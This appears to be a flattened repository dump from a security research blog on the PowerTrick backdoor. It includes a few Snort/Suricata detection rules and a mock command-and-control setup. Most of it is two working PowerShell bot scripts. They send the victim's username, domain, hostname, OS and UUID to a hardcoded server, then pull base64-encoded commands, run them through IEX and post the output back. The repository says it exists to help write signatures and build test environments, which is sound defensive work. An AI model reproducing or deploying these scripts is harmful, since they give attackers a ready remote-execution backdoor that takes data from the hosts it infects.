sid:9000024; rev:1; metadata:author Jason Reaves;)","Snort/Suricata IDS Rules",1,1578495272,"","","","","" 16 | "5e15ed28-de84-40c0-958f-2a9968f8e8cf",1295,"Network activity","snort","alert http $HOME_NET any -> $EXTERNAL_NET any (msg:""PowerTrick download bot known key""; content:""?x=UDRZQ1ZRRVI4VVdwZnp4VkZtVlNEeUJMektMM3lWNmM""; http_uri; 
classtype:trojan-activity; sid:9000025; rev:1; metadata:author Jason Reaves;)","Snort/Suricata IDS Rules",1,1578495272,"","","","","" 17 | 18 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PowerTrick 2 | This is a repository for the public blog with Labs indicators of compromise and code 3 | -------------------------------------------------------------------------------- /mock_panel/first.ps1: -------------------------------------------------------------------------------- 1 | $key='P4YCVQER8UWpfzxVFmVSDyBLzKL3yV6c'; 2 | $URL="http://192.168.1.91"; 3 | $timeout = 60; 4 | $uuid = (get-wmiobject Win32_ComputerSystemProduct).UUID; 5 | function b64e ($str) {if (!$str) { $str = '' };return [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($str));} 6 | function b64d ($str) {return [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($str))} 7 | function sendPostReq($a, $ps) { 8 | $ps.Add('p', $a); 9 | $ps.Add('p1', $key); 10 | $ps.Add('p2', (b64e -str $uuid)); 11 | $ps.Add('p9', (b64e -str $PID)); 12 | $WC = New-Object System.Net.WebClient 13 | $WC.UseDefaultCredentials = $true 14 | $Result = $WC.UploadValues($URL,"post", $NVC); 15 | $result = [System.Text.Encoding]::UTF8.GetString($Result) 16 | $WC.Dispose(); 17 | return $result; 18 | } 19 | Sleep $timeout 20 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 21 | $NVC.Add('p3', (b64e -str (Get-Item -Path ".\").FullName)); 22 | $res = (sendPostReq -a 'ip' -ps $NVC); 23 | if ($res -eq 'cex01' -Or $res -eq '') { 24 | taskkill /F /PID $PID 25 | return 26 | exit 27 | } else { 28 | $timeout = $res -replace "crx", "" 29 | } 30 | sleep $timeout; 31 | $working=$true 32 | while ($working) { 33 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 34 | $res = (sendPostReq -a 't' -ps $NVC); 35 | if ($res -ne '') { 36 | 
foreach($line in $res.Split([Environment]::NewLine)) { 37 | if ($line -ne '') { 38 | try { 39 | $decodedCommand = (b64d -str $line); 40 | $comm = $decodedCommand.Split([Environment]::NewLine); 41 | $exec = (b64d -str $comm[1]); 42 | $OutputVariable = (IEX "$exec") | Out-String; 43 | if ($? -eq $true) { 44 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 45 | $NVC.Add('p3', (b64e -str $OutputVariable)); 46 | $NVC.Add('p4', (b64e -str (Get-Item -Path ".\").FullName)); 47 | $NVC.Add('p5', (b64e -str $comm[0])); 48 | $res = (sendPostReq -a 'a' -ps $NVC); 49 | } else { 50 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 51 | $NVC.Add('p3', (b64e -str $error[0])); 52 | $NVC.Add('p4', (b64e -str (Get-Item -Path ".\").FullName)); 53 | $NVC.Add('p5', (b64e -str $comm[0])); 54 | $res = (sendPostReq -a 'a' -ps $NVC); 55 | } 56 | } catch { 57 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 58 | $NVC.Add('p3', (b64e -str $error[0])); 59 | $NVC.Add('p4', (b64e -str (Get-Item -Path ".\").FullName)); 60 | $res = (sendPostReq -a 'a' -ps $NVC); 61 | } 62 | $OutputVariable = ''; 63 | clear; 64 | } 65 | } 66 | } 67 | sleep $timeout; 68 | } 69 | -------------------------------------------------------------------------------- /mock_panel/generic_version.php: -------------------------------------------------------------------------------- 1 | 38 | -------------------------------------------------------------------------------- /mock_panel/index_first.php: -------------------------------------------------------------------------------- 1 | 44 | -------------------------------------------------------------------------------- /mock_panel/readme.txt: -------------------------------------------------------------------------------- 1 | This is a quick mock panel created with a single hardcoded command to execute on the bot. The intention was for it to be too simple to serve as a ready-made tool, yet complete enough to be 
able to generate signatures and test environments. 2 | 3 | You can change the server IP in the bot script, and it should work fine: 4 | $URL="http://192.168.1.91"; 5 | 6 | If you don't want the log file on the PHP side, just remove it. 7 | 8 | 9 | Files: 10 | first.ps1 - ver1 of bot script 11 | index_first.php - PHP for ver1 of bot 12 | second.ps1 - more recent version of bot script 13 | generic_version.php - more generic PHP for both versions of the bot 14 | -------------------------------------------------------------------------------- /mock_panel/second.ps1: -------------------------------------------------------------------------------- 1 | $key='P4YCVQER8UWpfzxVFmVSDyBLzKL3yV6c'; 2 | $URL="http://192.168.1.91"; 3 | $timeout = 60; 4 | $uuid = (get-wmiobject Win32_ComputerSystemProduct).UUID; 5 | function b64e ($str) {if (!$str) { $str = '' };return [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($str));} 6 | function b64d ($str) {return [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($str))} 7 | function sendPostReq($a, $ps) { 8 | $ps.Add('p', $a); 9 | $ps.Add('p1', $key); 10 | $ps.Add('p2', (b64e -str $uuid)); 11 | $ps.Add('p9', (b64e -str $PID)); 12 | $WC = New-Object System.Net.WebClient 13 | $WC.UseDefaultCredentials = $true 14 | $Result = $WC.UploadValues($URL,"post", $NVC); 15 | $result = [System.Text.Encoding]::UTF8.GetString($Result) 16 | $WC.Dispose(); 17 | return $result; 18 | } 19 | Sleep $timeout 20 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 21 | $NVC.Add('p3', (b64e -str "$($env:UserDomain)\$($env:UserName)")); 22 | $NVC.Add('p4', (b64e -str $env:ComputerName)); 23 | $NVC.Add('p5', (b64e -str (Get-Item -Path ".\").FullName)); 24 | $NVC.Add('p7', (b64e -str (Get-WmiObject -class Win32_OperatingSystem).Caption)); 25 | $NVC.Add('p8', (b64e -str (Get-WmiObject Win32_OperatingSystem).OSArchitecture)); 26 | $NVC.Add('p10', (b64e -str 
([Security.Principal.WindowsIdentity]::GetCurrent().Name))); 27 | $res = (sendPostReq -a 'i' -ps $NVC); 28 | if ($res -eq 'cex01') { 29 | taskkill /F /PID $PID 30 | return 31 | exit 32 | } else { 33 | $timeout = $res -replace "crx", "" 34 | } 35 | sleep $timeout; 36 | $working=$true 37 | while ($working) { 38 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 39 | $res = (sendPostReq -a 't' -ps $NVC); 40 | if ($res -ne '') { 41 | foreach($line in $res.Split([Environment]::NewLine)) { 42 | if ($line -ne '') { 43 | try { 44 | $decodedCommand = (b64d -str $line); 45 | $comm = $decodedCommand.Split([Environment]::NewLine); 46 | $OutputVariable = (IEX (b64d -str $comm[1])) | Out-String; 47 | if ($?) { 48 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 49 | $NVC.Add('p3', (b64e -str $OutputVariable)); 50 | $NVC.Add('p4', (b64e -str (Get-Item -Path ".\").FullName)); 51 | $NVC.Add('p5', (b64e -str $comm[0])); 52 | $res = (sendPostReq -a 'a' -ps $NVC); 53 | } else { 54 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 55 | $NVC.Add('p3', (b64e -str $error[0])); 56 | $NVC.Add('p4', (b64e -str (Get-Item -Path ".\").FullName)); 57 | $NVC.Add('p5', (b64e -str $comm[0])); 58 | $res = (sendPostReq -a 'a' -ps $NVC); 59 | } 60 | } catch { 61 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 62 | $NVC.Add('p3', (b64e -str $_)); 63 | $NVC.Add('p4', (b64e -str (Get-Item -Path ".\").FullName)); 64 | $res = (sendPostReq -a 'a' -ps $NVC); 65 | } 66 | $OutputVariable = ''; 67 | clear; 68 | } 69 | } 70 | } 71 | sleep $timeout; 72 | } 73 | --------------------------------------------------------------------------------